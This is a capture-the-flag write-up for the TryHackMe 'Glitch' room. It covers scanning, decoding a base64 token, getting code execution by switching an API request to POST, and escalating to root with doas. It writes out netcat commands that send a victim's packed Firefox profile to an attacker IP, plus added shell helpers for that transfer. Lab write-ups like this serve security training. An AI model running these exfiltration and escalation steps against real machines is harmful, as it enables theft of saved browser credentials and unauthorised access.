TryHackMe GLITCH Writeup

As usual, we start with an nmap scan.
Command: nmap -vv -sCV 10.10.15.163
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack nginx 1.14.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: not allowed
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Only the HTTP port is open. Let's take a look at the page source.

We open the browser console and call the getAccess() function, which returns a token.

The token is base64 encoded (not encrypted). We decode it, set it as the value of the cookie, and get into the site.
Command: echo 'd*************************==' |base64 -d
t***_**_****_***l
TryHackMe also gives us the hint "What other methods does the API accept?" We catch the request in Burp, see that it is sent with the GET method, and change it to a POST request.


With POST accepted, the API takes a parameter that gives us remote code execution (RCE), and we use it to get a shell on the box.


We spawn a pty with Python, then export TERM inside the new shell (the original command had the quotes nested wrongly and ran the export only after the pty exited).
Command: python -c 'import pty;pty.spawn("/bin/bash")'
Command: export TERM=xterm
user.txt is right there:
THM{i**************y}

There is a .firefox/ profile directory in the home folder. We pack it with tar and pull it to the attacker box with netcat. Start the listener on the attacker side first; note the tar flag order, -f must be followed directly by the archive name.
Attacker
Command: nc -lvp 1234 > a.tar.gz
Victim Box
Command: tar -czf a.tar.gz .firefox/
Command: nc 10.9.45.10 1234 < a.tar.gz
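The pack-and-transfer step above, as an added example that is not part of the original writeup: a few shell helpers that build the archive with the correct tar flags, hash it, and let the receiving side confirm the netcat transfer was complete. A plain `nc` redirect gives no integrity check, so comparing a SHA-256 on both ends is the caveat worth adding. The attacker IP and port come from the writeup; the directory layout in demo() is constructed sample data, not a real Firefox profile.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): pack a directory, hash it,
# and move it over netcat with a hash check on the receiving side.
set -e

# pack_dir SRC_DIR OUT_ARCHIVE
# Gzip-compressed tarball of SRC_DIR. Flag order matters: -f takes the very next
# argument as the archive name, so it is "-czf a.tar.gz DIR", not "-cfz a.tar DIR".
pack_dir() {
    local src="$1" out="$2"
    tar -czf "$out" -C "$(dirname "$src")" "$(basename "$src")"
    echo "$out"
}

# archive_sha256 FILE -> hex digest only (falls back to shasum where sha256sum is absent)
archive_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# archive_has FILE MEMBER -> success if MEMBER is listed in the tarball
# (grep without -q so tar is read to the end and never gets SIGPIPE)
archive_has() {
    tar -tzf "$1" | grep -xF "$2" >/dev/null
}

# Victim side: push the archive to the listener (run receive_archive first).
# send_archive FILE HOST PORT
send_archive() {
    archive_sha256 "$1"          # print the hash so it can be compared on the other end
    nc "$2" "$3" < "$1"
}

# Attacker side: receive into FILE and refuse a truncated transfer.
# receive_archive FILE PORT EXPECTED_SHA256
receive_archive() {
    nc -lvp "$2" > "$1"
    if [ "$(archive_sha256 "$1")" != "$3" ]; then
        echo "hash mismatch: transfer incomplete or corrupted" >&2
        return 1
    fi
}

# Constructed sample input so the helpers can be exercised without a target.
# Returns the digest of the archive it built.
demo() {
    local work
    work="$(mktemp -d)"
    mkdir -p "$work/.firefox/profile"
    printf 'constructed sample, not a real profile\n' > "$work/.firefox/profile/logins.json"
    pack_dir "$work/.firefox" "$work/a.tar.gz" >/dev/null
    archive_sha256 "$work/a.tar.gz"
}
```

On the box you would run `send_archive a.tar.gz 10.9.45.10 1234` after `receive_archive a.tar.gz 1234 <hash>` is listening on the attacker side; the hash printed by send_archive is the value to pass to receive_archive.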


doas (https://github.com/slicer69/doas) is installed on the box, and running it as root drops us into a root shell.
Command: doas -u root bash

Thank you for reading and solving